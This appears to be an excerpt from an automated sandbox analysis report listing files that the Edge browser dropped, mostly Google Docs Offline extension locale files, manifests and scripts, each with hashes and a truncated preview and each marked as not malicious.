                                                                                                                                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11406
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                  MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                  SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                  SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                  SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                  MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                  SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                  SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                  SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):122218
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                  MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                  SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                  SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                  SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):130866
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                  MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                  SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                  SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                  SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
